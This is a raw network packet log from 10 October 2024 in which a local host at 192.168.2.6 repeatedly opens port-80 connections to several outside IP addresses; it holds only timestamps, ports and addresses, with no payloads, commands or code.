                                                                                                                                            Oct 10, 2024 12:52:55.966408014 CEST806141067.223.117.189192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:55.966440916 CEST806141067.223.117.189192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:55.966471910 CEST806141067.223.117.189192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:55.966485023 CEST6141080192.168.2.667.223.117.189
                                                                                                                                            Oct 10, 2024 12:52:55.966485977 CEST6141080192.168.2.667.223.117.189
                                                                                                                                            Oct 10, 2024 12:52:55.966485977 CEST6141080192.168.2.667.223.117.189
                                                                                                                                            Oct 10, 2024 12:52:55.966511965 CEST806141067.223.117.189192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:55.966576099 CEST6141080192.168.2.667.223.117.189
                                                                                                                                            Oct 10, 2024 12:52:55.967140913 CEST806141067.223.117.189192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:55.967175007 CEST806141067.223.117.189192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:55.967207909 CEST806141067.223.117.189192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:55.967240095 CEST806141067.223.117.189192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:55.967247963 CEST6141080192.168.2.667.223.117.189
                                                                                                                                            Oct 10, 2024 12:52:55.967272997 CEST806141067.223.117.189192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:55.967293024 CEST6141080192.168.2.667.223.117.189
                                                                                                                                            Oct 10, 2024 12:52:55.967308998 CEST806141067.223.117.189192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:55.967350960 CEST6141080192.168.2.667.223.117.189
                                                                                                                                            Oct 10, 2024 12:52:55.967921019 CEST806141067.223.117.189192.168.2.6
                                                                                                                                            Oct 10, 2024 12:52:55.968126059 CEST6141080192.168.2.667.223.117.189
                                                                                                                                            Oct 10, 2024 12:52:55.973684072 CEST6141080192.168.2.667.223.117.189
                                                                                                                                            Oct 10, 2024 12:52:55.978501081 CEST806141067.223.117.189192.168.2.6
                                                                                                                                            Oct 10, 2024 12:53:00.994427919 CEST6141180192.168.2.63.33.130.190
                                                                                                                                            Oct 10, 2024 12:53:00.999676943 CEST80614113.33.130.190192.168.2.6
                                                                                                                                            Oct 10, 2024 12:53:00.999768019 CEST6141180192.168.2.63.33.130.190
                                                                                                                                            Oct 10, 2024 12:53:01.011142969 CEST6141180192.168.2.63.33.130.190
                                                                                                                                            Oct 10, 2024 12:53:01.015991926 CEST80614113.33.130.190192.168.2.6
                                                                                                                                            Oct 10, 2024 12:53:01.475549936 CEST80614113.33.130.190192.168.2.6
                                                                                                                                            Oct 10, 2024 12:53:01.475920916 CEST6141180192.168.2.63.33.130.190
                                                                                                                                            Oct 10, 2024 12:53:02.521960020 CEST6141180192.168.2.63.33.130.190
                                                                                                                                            Oct 10, 2024 12:53:02.527008057 CEST80614113.33.130.190192.168.2.6
                                                                                                                                            Oct 10, 2024 12:53:03.541851997 CEST6141280192.168.2.63.33.130.190
                                                                                                                                            Oct 10, 2024 12:53:03.547117949 CEST80614123.33.130.190192.168.2.6
                                                                                                                                            Oct 10, 2024 12:53:03.547254086 CEST6141280192.168.2.63.33.130.190
                                                                                                                                            Oct 10, 2024 12:53:03.562704086 CEST6141280192.168.2.63.33.130.190
                                                                                                                                            Oct 10, 2024 12:53:03.567871094 CEST80614123.33.130.190192.168.2.6
                                                                                                                                            Oct 10, 2024 12:53:04.030980110 CEST80614123.33.130.190192.168.2.6
                                                                                                                                            Oct 10, 2024 12:53:04.031121016 CEST6141280192.168.2.63.33.130.190
                                                                                                                                            Oct 10, 2024 12:53:05.068962097 CEST6141280192.168.2.63.33.130.190
                                                                                                                                            Oct 10, 2024 12:53:05.074157000 CEST80614123.33.130.190192.168.2.6
                                                                                                                                            Oct 10, 2024 12:53:06.087045908 CEST6141380192.168.2.63.33.130.190
                                                                                                                                            Oct 10, 2024 12:53:06.092053890 CEST80614133.33.130.190192.168.2.6
                                                                                                                                            Oct 10, 2024 12:53:06.092205048 CEST6141380192.168.2.63.33.130.190
                                                                                                                                            Oct 10, 2024 12:53:06.101797104 CEST6141380192.168.2.63.33.130.190
                                                                                                                                            Oct 10, 2024 12:53:06.106719017 CEST80614133.33.130.190192.168.2.6
                                                                                                                                            Oct 10, 2024 12:53:06.106873035 CEST80614133.33.130.190192.168.2.6
                                                                                                                                            Oct 10, 2024 12:53:06.556775093 CEST80614133.33.130.190192.168.2.6
                                                                                                                                            Oct 10, 2024 12:53:06.556865931 CEST6141380192.168.2.63.33.130.190
                                                                                                                                            Oct 10, 2024 12:53:07.617785931 CEST6141380192.168.2.63.33.130.190
                                                                                                                                            Oct 10, 2024 12:53:07.622764111 CEST80614133.33.130.190192.168.2.6
                                                                                                                                            Oct 10, 2024 12:53:08.636348963 CEST6141480192.168.2.63.33.130.190
                                                                                                                                            Oct 10, 2024 12:53:08.641310930 CEST80614143.33.130.190192.168.2.6
                                                                                                                                            Oct 10, 2024 12:53:08.641468048 CEST6141480192.168.2.63.33.130.190
                                                                                                                                            Oct 10, 2024 12:53:08.648664951 CEST6141480192.168.2.63.33.130.190
                                                                                                                                            Oct 10, 2024 12:53:08.653471947 CEST80614143.33.130.190192.168.2.6
                                                                                                                                            Oct 10, 2024 12:53:09.154681921 CEST80614143.33.130.190192.168.2.6
                                                                                                                                            Oct 10, 2024 12:53:09.154702902 CEST80614143.33.130.190192.168.2.6
                                                                                                                                            Oct 10, 2024 12:53:09.154771090 CEST80614143.33.130.190192.168.2.6
                                                                                                                                            Oct 10, 2024 12:53:09.154942036 CEST6141480192.168.2.63.33.130.190
                                                                                                                                            Oct 10, 2024 12:53:09.157854080 CEST6141480192.168.2.63.33.130.190
                                                                                                                                            Oct 10, 2024 12:53:09.162600040 CEST80614143.33.130.190192.168.2.6
                                                                                                                                            Oct 10, 2024 12:53:14.250473976 CEST6141580192.168.2.6217.70.184.50
                                                                                                                                            Oct 10, 2024 12:53:14.255615950 CEST8061415217.70.184.50192.168.2.6
                                                                                                                                            Oct 10, 2024 12:53:14.255687952 CEST6141580192.168.2.6217.70.184.50
                                                                                                                                            Oct 10, 2024 12:53:14.268765926 CEST6141580192.168.2.6217.70.184.50
                                                                                                                                            Oct 10, 2024 12:53:14.273598909 CEST8061415217.70.184.50192.168.2.6
                                                                                                                                            Oct 10, 2024 12:53:15.215898991 CEST8061415217.70.184.50192.168.2.6
                                                                                                                                            Oct 10, 2024 12:53:15.215918064 CEST8061415217.70.184.50192.168.2.6
                                                                                                                                            Oct 10, 2024 12:53:15.217816114 CEST6141580192.168.2.6217.70.184.50
                                                                                                                                            Oct 10, 2024 12:53:15.773488045 CEST6141580192.168.2.6217.70.184.50
                                                                                                                                            Oct 10, 2024 12:53:16.791724920 CEST6141680192.168.2.6217.70.184.50
                                                                                                                                            Oct 10, 2024 12:53:16.796542883 CEST8061416217.70.184.50192.168.2.6
                                                                                                                                            Oct 10, 2024 12:53:16.796607971 CEST6141680192.168.2.6217.70.184.50
                                                                                                                                            Oct 10, 2024 12:53:16.807169914 CEST6141680192.168.2.6217.70.184.50
                                                                                                                                            Oct 10, 2024 12:53:16.811992884 CEST8061416217.70.184.50192.168.2.6
                                                                                                                                            Oct 10, 2024 12:53:17.472230911 CEST8061416217.70.184.50192.168.2.6
                                                                                                                                            Oct 10, 2024 12:53:17.472852945 CEST8061416217.70.184.50192.168.2.6
                                                                                                                                            Oct 10, 2024 12:53:17.473803043 CEST6141680192.168.2.6217.70.184.50
                                                                                                                                            Oct 10, 2024 12:53:18.322416067 CEST6141680192.168.2.6217.70.184.50
                                                                                                                                            Oct 10, 2024 12:53:19.337084055 CEST6141780192.168.2.6217.70.184.50
                                                                                                                                            Oct 10, 2024 12:53:19.342155933 CEST8061417217.70.184.50192.168.2.6
                                                                                                                                            Oct 10, 2024 12:53:19.342267036 CEST6141780192.168.2.6217.70.184.50
                                                                                                                                            Oct 10, 2024 12:53:19.353768110 CEST6141780192.168.2.6217.70.184.50
                                                                                                                                            Oct 10, 2024 12:53:19.358700037 CEST8061417217.70.184.50192.168.2.6
                                                                                                                                            Oct 10, 2024 12:53:19.358891010 CEST8061417217.70.184.50192.168.2.6
                                                                                                                                            Oct 10, 2024 12:53:20.093991995 CEST8061417217.70.184.50192.168.2.6
                                                                                                                                            Oct 10, 2024 12:53:20.094029903 CEST8061417217.70.184.50192.168.2.6
                                                                                                                                            Oct 10, 2024 12:53:20.094126940 CEST6141780192.168.2.6217.70.184.50
                                                                                                                                            Oct 10, 2024 12:53:20.865796089 CEST6141780192.168.2.6217.70.184.50
                                                                                                                                            Oct 10, 2024 12:53:21.885766029 CEST6141880192.168.2.6217.70.184.50
                                                                                                                                            Oct 10, 2024 12:53:21.890659094 CEST8061418217.70.184.50192.168.2.6
                                                                                                                                            Oct 10, 2024 12:53:21.897753000 CEST6141880192.168.2.6217.70.184.50
                                                                                                                                            Oct 10, 2024 12:53:21.901766062 CEST6141880192.168.2.6217.70.184.50
                                                                                                                                            Oct 10, 2024 12:53:21.906568050 CEST8061418217.70.184.50192.168.2.6
                                                                                                                                            Oct 10, 2024 12:53:22.611449957 CEST8061418217.70.184.50192.168.2.6
                                                                                                                                            Oct 10, 2024 12:53:22.611862898 CEST8061418217.70.184.50192.168.2.6
                                                                                                                                            Oct 10, 2024 12:53:22.611886024 CEST8061418217.70.184.50192.168.2.6
                                                                                                                                            Oct 10, 2024 12:53:22.611898899 CEST8061418217.70.184.50192.168.2.6
                                                                                                                                            Oct 10, 2024 12:53:22.612006903 CEST6141880192.168.2.6217.70.184.50
                                                                                                                                            Oct 10, 2024 12:53:22.612006903 CEST6141880192.168.2.6217.70.184.50
                                                                                                                                            Oct 10, 2024 12:53:22.615916014 CEST6141880192.168.2.6217.70.184.50
                                                                                                                                            Oct 10, 2024 12:53:22.620759964 CEST8061418217.70.184.50192.168.2.6
                                                                                                                                            Oct 10, 2024 12:53:27.694005966 CEST6141980192.168.2.645.33.18.44
                                                                                                                                            Oct 10, 2024 12:53:27.698983908 CEST806141945.33.18.44192.168.2.6
                                                                                                                                            Oct 10, 2024 12:53:27.699095011 CEST6141980192.168.2.645.33.18.44
                                                                                                                                            Oct 10, 2024 12:53:27.817924976 CEST6141980192.168.2.645.33.18.44
                                                                                                                                            Oct 10, 2024 12:53:27.823621988 CEST806141945.33.18.44192.168.2.6
                                                                                                                                            Oct 10, 2024 12:53:28.220552921 CEST806141945.33.18.44192.168.2.6
                                                                                                                                            Oct 10, 2024 12:53:28.220573902 CEST806141945.33.18.44192.168.2.6
                                                                                                                                            Oct 10, 2024 12:53:28.220784903 CEST6141980192.168.2.645.33.18.44
                                                                                                                                            Oct 10, 2024 12:53:29.334525108 CEST6141980192.168.2.645.33.18.44
                                                                                                                                            Oct 10, 2024 12:53:30.364253998 CEST6142080192.168.2.645.33.18.44
                                                                                                                                            Oct 10, 2024 12:53:30.369256020 CEST806142045.33.18.44192.168.2.6
                                                                                                                                            Oct 10, 2024 12:53:30.369339943 CEST6142080192.168.2.645.33.18.44
                                                                                                                                            Oct 10, 2024 12:53:30.431551933 CEST6142080192.168.2.645.33.18.44
                                                                                                                                            Oct 10, 2024 12:53:30.436438084 CEST806142045.33.18.44192.168.2.6
                                                                                                                                            Oct 10, 2024 12:53:30.883569956 CEST806142045.33.18.44192.168.2.6
                                                                                                                                            Oct 10, 2024 12:53:30.883632898 CEST806142045.33.18.44192.168.2.6
                                                                                                                                            Oct 10, 2024 12:53:30.883677006 CEST6142080192.168.2.645.33.18.44
                                                                                                                                            Oct 10, 2024 12:53:31.945554972 CEST6142080192.168.2.645.33.18.44
                                                                                                                                            Oct 10, 2024 12:53:33.035167933 CEST6142180192.168.2.645.33.18.44
                                                                                                                                            Oct 10, 2024 12:53:33.040312052 CEST806142145.33.18.44192.168.2.6
                                                                                                                                            Oct 10, 2024 12:53:33.040390968 CEST6142180192.168.2.645.33.18.44
                                                                                                                                            Oct 10, 2024 12:53:33.085818052 CEST6142180192.168.2.645.33.18.44
                                                                                                                                            Oct 10, 2024 12:53:33.090646982 CEST806142145.33.18.44192.168.2.6
                                                                                                                                            Oct 10, 2024 12:53:33.090816021 CEST806142145.33.18.44192.168.2.6
                                                                                                                                            Oct 10, 2024 12:53:33.603764057 CEST806142145.33.18.44192.168.2.6
                                                                                                                                            Oct 10, 2024 12:53:33.603864908 CEST806142145.33.18.44192.168.2.6
                                                                                                                                            Oct 10, 2024 12:53:33.603949070 CEST6142180192.168.2.645.33.18.44
                                                                                                                                            Oct 10, 2024 12:53:34.600159883 CEST6142180192.168.2.645.33.18.44
                                                                                                                                            Oct 10, 2024 12:53:35.645612001 CEST6142380192.168.2.645.33.18.44
                                                                                                                                            Oct 10, 2024 12:53:35.650490999 CEST806142345.33.18.44192.168.2.6
                                                                                                                                            Oct 10, 2024 12:53:35.650813103 CEST6142380192.168.2.645.33.18.44
                                                                                                                                            Oct 10, 2024 12:53:35.677773952 CEST6142380192.168.2.645.33.18.44
                                                                                                                                            Oct 10, 2024 12:53:35.682588100 CEST806142345.33.18.44192.168.2.6
                                                                                                                                            Oct 10, 2024 12:53:36.170260906 CEST806142345.33.18.44192.168.2.6
                                                                                                                                            Oct 10, 2024 12:53:36.170277119 CEST806142345.33.18.44192.168.2.6
                                                                                                                                            Oct 10, 2024 12:53:36.170289993 CEST806142345.33.18.44192.168.2.6
                                                                                                                                            Oct 10, 2024 12:53:36.170474052 CEST6142380192.168.2.645.33.18.44
                                                                                                                                            Oct 10, 2024 12:53:36.173777103 CEST6142380192.168.2.645.33.18.44
                                                                                                                                            Oct 10, 2024 12:53:36.178587914 CEST806142345.33.18.44192.168.2.6
                                                                                                                                            Oct 10, 2024 12:53:41.632024050 CEST6142480192.168.2.654.67.42.145
                                                                                                                                            Oct 10, 2024 12:53:41.637006044 CEST806142454.67.42.145192.168.2.6
                                                                                                                                            Oct 10, 2024 12:53:41.637881994 CEST6142480192.168.2.654.67.42.145
                                                                                                                                            Oct 10, 2024 12:53:41.649804115 CEST6142480192.168.2.654.67.42.145
                                                                                                                                            Oct 10, 2024 12:53:41.654640913 CEST806142454.67.42.145192.168.2.6
                                                                                                                                            Oct 10, 2024 12:53:42.473723888 CEST806142454.67.42.145192.168.2.6
                                                                                                                                            Oct 10, 2024 12:53:42.473747015 CEST806142454.67.42.145192.168.2.6
                                                                                                                                            Oct 10, 2024 12:53:42.473756075 CEST806142454.67.42.145192.168.2.6
                                                                                                                                            Oct 10, 2024 12:53:42.473797083 CEST6142480192.168.2.654.67.42.145
                                                                                                                                            Oct 10, 2024 12:53:42.473815918 CEST6142480192.168.2.654.67.42.145
                                                                                                                                            Oct 10, 2024 12:53:42.475938082 CEST806142454.67.42.145192.168.2.6
                                                                                                                                            Oct 10, 2024 12:53:42.475981951 CEST6142480192.168.2.654.67.42.145
                                                                                                                                            Oct 10, 2024 12:53:43.162667036 CEST6142480192.168.2.654.67.42.145
                                                                                                                                            Oct 10, 2024 12:53:44.181237936 CEST6142580192.168.2.654.67.42.145
                                                                                                                                            Oct 10, 2024 12:53:44.186417103 CEST806142554.67.42.145192.168.2.6
                                                                                                                                            Oct 10, 2024 12:53:44.189944029 CEST6142580192.168.2.654.67.42.145
                                                                                                                                            Oct 10, 2024 12:53:44.201814890 CEST6142580192.168.2.654.67.42.145
                                                                                                                                            Oct 10, 2024 12:53:44.206820965 CEST806142554.67.42.145192.168.2.6
                                                                                                                                            Oct 10, 2024 12:53:44.769345045 CEST806142554.67.42.145192.168.2.6
                                                                                                                                            Oct 10, 2024 12:53:44.769906998 CEST806142554.67.42.145192.168.2.6
                                                                                                                                            Oct 10, 2024 12:53:44.770071983 CEST6142580192.168.2.654.67.42.145
                                                                                                                                            Oct 10, 2024 12:53:45.709605932 CEST6142580192.168.2.654.67.42.145
                                                                                                                                            Oct 10, 2024 12:53:46.728522062 CEST6142680192.168.2.654.67.42.145
                                                                                                                                            Oct 10, 2024 12:53:47.268754005 CEST806142654.67.42.145192.168.2.6
                                                                                                                                            Oct 10, 2024 12:53:47.268851042 CEST6142680192.168.2.654.67.42.145
                                                                                                                                            Oct 10, 2024 12:53:47.278078079 CEST6142680192.168.2.654.67.42.145
                                                                                                                                            Oct 10, 2024 12:53:47.282939911 CEST806142654.67.42.145192.168.2.6
                                                                                                                                            Oct 10, 2024 12:53:47.283061028 CEST806142654.67.42.145192.168.2.6
                                                                                                                                            Oct 10, 2024 12:53:47.939517021 CEST806142654.67.42.145192.168.2.6
                                                                                                                                            Oct 10, 2024 12:53:47.939753056 CEST806142654.67.42.145192.168.2.6
                                                                                                                                            Oct 10, 2024 12:53:47.939826012 CEST6142680192.168.2.654.67.42.145
                                                                                                                                            Oct 10, 2024 12:53:48.787692070 CEST6142680192.168.2.654.67.42.145
                                                                                                                                            Oct 10, 2024 12:53:49.806117058 CEST6142780192.168.2.654.67.42.145
                                                                                                                                            Oct 10, 2024 12:53:49.811148882 CEST806142754.67.42.145192.168.2.6
                                                                                                                                            Oct 10, 2024 12:53:49.811309099 CEST6142780192.168.2.654.67.42.145
                                                                                                                                            Oct 10, 2024 12:53:49.823879957 CEST6142780192.168.2.654.67.42.145
                                                                                                                                            Oct 10, 2024 12:53:49.828762054 CEST806142754.67.42.145192.168.2.6
                                                                                                                                            Oct 10, 2024 12:53:50.392728090 CEST806142754.67.42.145192.168.2.6
                                                                                                                                            Oct 10, 2024 12:53:50.392793894 CEST806142754.67.42.145192.168.2.6
                                                                                                                                            Oct 10, 2024 12:53:50.392877102 CEST6142780192.168.2.654.67.42.145
                                                                                                                                            Oct 10, 2024 12:53:50.395597935 CEST6142780192.168.2.654.67.42.145
                                                                                                                                            Oct 10, 2024 12:53:50.400882959 CEST806142754.67.42.145192.168.2.6
                                                                                                                                            Oct 10, 2024 12:53:55.431782961 CEST6142880192.168.2.6172.67.181.150
                                                                                                                                            Oct 10, 2024 12:53:55.436722994 CEST8061428172.67.181.150192.168.2.6
                                                                                                                                            Oct 10, 2024 12:53:55.436841965 CEST6142880192.168.2.6172.67.181.150
                                                                                                                                            Oct 10, 2024 12:53:55.445986986 CEST6142880192.168.2.6172.67.181.150
                                                                                                                                            Oct 10, 2024 12:53:55.451082945 CEST8061428172.67.181.150192.168.2.6
                                                                                                                                            Oct 10, 2024 12:53:56.709448099 CEST8061428172.67.181.150192.168.2.6
                                                                                                                                            Oct 10, 2024 12:53:56.710133076 CEST8061428172.67.181.150192.168.2.6
                                                                                                                                            Oct 10, 2024 12:53:56.710210085 CEST6142880192.168.2.6172.67.181.150
                                                                                                                                            Oct 10, 2024 12:53:56.959570885 CEST6142880192.168.2.6172.67.181.150
                                                                                                                                            Oct 10, 2024 12:53:57.979691029 CEST6142980192.168.2.6172.67.181.150
                                                                                                                                            Oct 10, 2024 12:53:57.984565020 CEST8061429172.67.181.150192.168.2.6
                                                                                                                                            Oct 10, 2024 12:53:57.985235929 CEST6142980192.168.2.6172.67.181.150
                                                                                                                                            Oct 10, 2024 12:53:57.996484041 CEST6142980192.168.2.6172.67.181.150
                                                                                                                                            Oct 10, 2024 12:53:58.001605034 CEST8061429172.67.181.150192.168.2.6
                                                                                                                                            Oct 10, 2024 12:53:59.178477049 CEST8061429172.67.181.150192.168.2.6
                                                                                                                                            Oct 10, 2024 12:53:59.179208994 CEST8061429172.67.181.150192.168.2.6
                                                                                                                                            Oct 10, 2024 12:53:59.179255962 CEST6142980192.168.2.6172.67.181.150
                                                                                                                                            Oct 10, 2024 12:53:59.506457090 CEST6142980192.168.2.6172.67.181.150
                                                                                                                                            Oct 10, 2024 12:54:00.524689913 CEST6143080192.168.2.6172.67.181.150
                                                                                                                                            Oct 10, 2024 12:54:00.529629946 CEST8061430172.67.181.150192.168.2.6
                                                                                                                                            Oct 10, 2024 12:54:00.529686928 CEST6143080192.168.2.6172.67.181.150
                                                                                                                                            Oct 10, 2024 12:54:00.538574934 CEST6143080192.168.2.6172.67.181.150
                                                                                                                                            Oct 10, 2024 12:54:00.543431044 CEST8061430172.67.181.150192.168.2.6
                                                                                                                                            Oct 10, 2024 12:54:00.543575048 CEST8061430172.67.181.150192.168.2.6
                                                                                                                                            Oct 10, 2024 12:54:01.612015963 CEST8061430172.67.181.150192.168.2.6
                                                                                                                                            Oct 10, 2024 12:54:01.612068892 CEST8061430172.67.181.150192.168.2.6
                                                                                                                                            Oct 10, 2024 12:54:01.612139940 CEST6143080192.168.2.6172.67.181.150
                                                                                                                                            Oct 10, 2024 12:54:02.053796053 CEST6143080192.168.2.6172.67.181.150
                                                                                                                                            Oct 10, 2024 12:54:03.072072029 CEST6143180192.168.2.6172.67.181.150
                                                                                                                                            Oct 10, 2024 12:54:03.076981068 CEST8061431172.67.181.150192.168.2.6
                                                                                                                                            Oct 10, 2024 12:54:03.077114105 CEST6143180192.168.2.6172.67.181.150
                                                                                                                                            Oct 10, 2024 12:54:03.085782051 CEST6143180192.168.2.6172.67.181.150
                                                                                                                                            Oct 10, 2024 12:54:03.090801001 CEST8061431172.67.181.150192.168.2.6
                                                                                                                                            Oct 10, 2024 12:54:04.546139956 CEST8061431172.67.181.150192.168.2.6
                                                                                                                                            Oct 10, 2024 12:54:04.546181917 CEST8061431172.67.181.150192.168.2.6
                                                                                                                                            Oct 10, 2024 12:54:04.546211004 CEST8061431172.67.181.150192.168.2.6
                                                                                                                                            Oct 10, 2024 12:54:04.546295881 CEST6143180192.168.2.6172.67.181.150
                                                                                                                                            Oct 10, 2024 12:54:04.548835993 CEST6143180192.168.2.6172.67.181.150
                                                                                                                                            Oct 10, 2024 12:54:04.555912971 CEST8061431172.67.181.150192.168.2.6
                                                                                                                                            Oct 10, 2024 12:54:09.657591105 CEST6143280192.168.2.63.33.130.190
                                                                                                                                            Oct 10, 2024 12:54:09.662493944 CEST80614323.33.130.190192.168.2.6
                                                                                                                                            Oct 10, 2024 12:54:09.662868977 CEST6143280192.168.2.63.33.130.190
                                                                                                                                            Oct 10, 2024 12:54:09.672821999 CEST6143280192.168.2.63.33.130.190
                                                                                                                                            Oct 10, 2024 12:54:09.677721977 CEST80614323.33.130.190192.168.2.6
                                                                                                                                            Oct 10, 2024 12:54:10.136985064 CEST80614323.33.130.190192.168.2.6
                                                                                                                                            Oct 10, 2024 12:54:10.137104988 CEST6143280192.168.2.63.33.130.190
                                                                                                                                            Oct 10, 2024 12:54:11.178361893 CEST6143280192.168.2.63.33.130.190
                                                                                                                                            Oct 10, 2024 12:54:11.183300018 CEST80614323.33.130.190192.168.2.6
                                                                                                                                            Oct 10, 2024 12:54:12.197873116 CEST6143380192.168.2.63.33.130.190
                                                                                                                                            Oct 10, 2024 12:54:12.314842939 CEST80614333.33.130.190192.168.2.6
                                                                                                                                            Oct 10, 2024 12:54:12.314974070 CEST6143380192.168.2.63.33.130.190
                                                                                                                                            Oct 10, 2024 12:54:12.323878050 CEST6143380192.168.2.63.33.130.190
                                                                                                                                            Oct 10, 2024 12:54:12.328739882 CEST80614333.33.130.190192.168.2.6
                                                                                                                                            Oct 10, 2024 12:54:12.772187948 CEST80614333.33.130.190192.168.2.6
                                                                                                                                            Oct 10, 2024 12:54:12.772245884 CEST6143380192.168.2.63.33.130.190
                                                                                                                                            Oct 10, 2024 12:54:13.836523056 CEST6143380192.168.2.63.33.130.190
                                                                                                                                            Oct 10, 2024 12:54:13.898353100 CEST80614333.33.130.190192.168.2.6
                                                                                                                                            Oct 10, 2024 12:54:14.853272915 CEST6143480192.168.2.63.33.130.190
                                                                                                                                            Oct 10, 2024 12:54:14.858263969 CEST80614343.33.130.190192.168.2.6
                                                                                                                                            Oct 10, 2024 12:54:14.858345985 CEST6143480192.168.2.63.33.130.190
                                                                                                                                            Oct 10, 2024 12:54:14.871934891 CEST6143480192.168.2.63.33.130.190
                                                                                                                                            Oct 10, 2024 12:54:14.877163887 CEST80614343.33.130.190192.168.2.6
                                                                                                                                            Oct 10, 2024 12:54:14.877882004 CEST80614343.33.130.190192.168.2.6
                                                                                                                                            Oct 10, 2024 12:54:15.324800014 CEST80614343.33.130.190192.168.2.6
                                                                                                                                            Oct 10, 2024 12:54:15.324851990 CEST6143480192.168.2.63.33.130.190
                                                                                                                                            Oct 10, 2024 12:54:16.381506920 CEST6143480192.168.2.63.33.130.190
                                                                                                                                            Oct 10, 2024 12:54:16.386343002 CEST80614343.33.130.190192.168.2.6
                                                                                                                                            Oct 10, 2024 12:54:17.401902914 CEST6143580192.168.2.63.33.130.190
                                                                                                                                            Oct 10, 2024 12:54:17.506959915 CEST80614353.33.130.190192.168.2.6
                                                                                                                                            Oct 10, 2024 12:54:17.509968042 CEST6143580192.168.2.63.33.130.190
                                                                                                                                            Oct 10, 2024 12:54:17.516031027 CEST6143580192.168.2.63.33.130.190
                                                                                                                                            Oct 10, 2024 12:54:17.520828009 CEST80614353.33.130.190192.168.2.6
                                                                                                                                            Oct 10, 2024 12:54:17.970256090 CEST80614353.33.130.190192.168.2.6
                                                                                                                                            Oct 10, 2024 12:54:17.971345901 CEST80614353.33.130.190192.168.2.6
                                                                                                                                            Oct 10, 2024 12:54:17.974076986 CEST6143580192.168.2.63.33.130.190
                                                                                                                                            Oct 10, 2024 12:54:17.976346016 CEST6143580192.168.2.63.33.130.190
                                                                                                                                            Oct 10, 2024 12:54:17.981144905 CEST80614353.33.130.190192.168.2.6
                                                                                                                                            Oct 10, 2024 12:54:23.048022985 CEST6143680192.168.2.6217.70.184.50
                                                                                                                                            Oct 10, 2024 12:54:23.053400040 CEST8061436217.70.184.50192.168.2.6
                                                                                                                                            Oct 10, 2024 12:54:23.053483963 CEST6143680192.168.2.6217.70.184.50
                                                                                                                                            Oct 10, 2024 12:54:23.064888000 CEST6143680192.168.2.6217.70.184.50
                                                                                                                                            Oct 10, 2024 12:54:23.070064068 CEST8061436217.70.184.50192.168.2.6
                                                                                                                                            Oct 10, 2024 12:54:23.668988943 CEST8061436217.70.184.50192.168.2.6
                                                                                                                                            Oct 10, 2024 12:54:23.669131041 CEST8061436217.70.184.50192.168.2.6
                                                                                                                                            Oct 10, 2024 12:54:23.669342995 CEST6143680192.168.2.6217.70.184.50
                                                                                                                                            Oct 10, 2024 12:54:24.569015026 CEST6143680192.168.2.6217.70.184.50
                                                                                                                                            Oct 10, 2024 12:54:25.588679075 CEST6143780192.168.2.6217.70.184.50
                                                                                                                                            Oct 10, 2024 12:54:25.593782902 CEST8061437217.70.184.50192.168.2.6
                                                                                                                                            Oct 10, 2024 12:54:25.594002962 CEST6143780192.168.2.6217.70.184.50
                                                                                                                                            Oct 10, 2024 12:54:25.605915070 CEST6143780192.168.2.6217.70.184.50
                                                                                                                                            Oct 10, 2024 12:54:25.611694098 CEST8061437217.70.184.50192.168.2.6
                                                                                                                                            Oct 10, 2024 12:54:26.849142075 CEST8061437217.70.184.50192.168.2.6
                                                                                                                                            Oct 10, 2024 12:54:26.849220991 CEST8061437217.70.184.50192.168.2.6
                                                                                                                                            Oct 10, 2024 12:54:26.849270105 CEST8061437217.70.184.50192.168.2.6
                                                                                                                                            Oct 10, 2024 12:54:26.849289894 CEST6143780192.168.2.6217.70.184.50
                                                                                                                                            Oct 10, 2024 12:54:26.849317074 CEST6143780192.168.2.6217.70.184.50
                                                                                                                                            Oct 10, 2024 12:54:26.849426985 CEST8061437217.70.184.50192.168.2.6
                                                                                                                                            Oct 10, 2024 12:54:26.849463940 CEST6143780192.168.2.6217.70.184.50
                                                                                                                                            Oct 10, 2024 12:54:27.115926981 CEST6143780192.168.2.6217.70.184.50
                                                                                                                                            Oct 10, 2024 12:54:28.135646105 CEST6143880192.168.2.6217.70.184.50
                                                                                                                                            Oct 10, 2024 12:54:28.140708923 CEST8061438217.70.184.50192.168.2.6
                                                                                                                                            Oct 10, 2024 12:54:28.142010927 CEST6143880192.168.2.6217.70.184.50
                                                                                                                                            Oct 10, 2024 12:54:28.154716969 CEST6143880192.168.2.6217.70.184.50
                                                                                                                                            Oct 10, 2024 12:54:28.159625053 CEST8061438217.70.184.50192.168.2.6
                                                                                                                                            Oct 10, 2024 12:54:28.159930944 CEST8061438217.70.184.50192.168.2.6
                                                                                                                                            Oct 10, 2024 12:54:29.665920973 CEST6143880192.168.2.6217.70.184.50
                                                                                                                                            Oct 10, 2024 12:54:29.715992928 CEST8061438217.70.184.50192.168.2.6
                                                                                                                                            Oct 10, 2024 12:54:30.681389093 CEST6144080192.168.2.6217.70.184.50
                                                                                                                                            Oct 10, 2024 12:54:30.686326027 CEST8061440217.70.184.50192.168.2.6
                                                                                                                                            Oct 10, 2024 12:54:30.686407089 CEST6144080192.168.2.6217.70.184.50
                                                                                                                                            Oct 10, 2024 12:54:30.693490028 CEST6144080192.168.2.6217.70.184.50
                                                                                                                                            Oct 10, 2024 12:54:30.698503971 CEST8061440217.70.184.50192.168.2.6
                                                                                                                                            Oct 10, 2024 12:54:31.416568041 CEST8061440217.70.184.50192.168.2.6
                                                                                                                                            Oct 10, 2024 12:54:31.416805029 CEST8061440217.70.184.50192.168.2.6
                                                                                                                                            Oct 10, 2024 12:54:31.416903019 CEST8061440217.70.184.50192.168.2.6
                                                                                                                                            Oct 10, 2024 12:54:31.416958094 CEST6144080192.168.2.6217.70.184.50
                                                                                                                                            Oct 10, 2024 12:54:31.417057991 CEST6144080192.168.2.6217.70.184.50
                                                                                                                                            Oct 10, 2024 12:54:31.420547962 CEST6144080192.168.2.6217.70.184.50
                                                                                                                                            Oct 10, 2024 12:54:31.425393105 CEST8061440217.70.184.50192.168.2.6
                                                                                                                                            Oct 10, 2024 12:54:31.590559959 CEST8061438217.70.184.50192.168.2.6
                                                                                                                                            Oct 10, 2024 12:54:31.590631962 CEST6143880192.168.2.6217.70.184.50
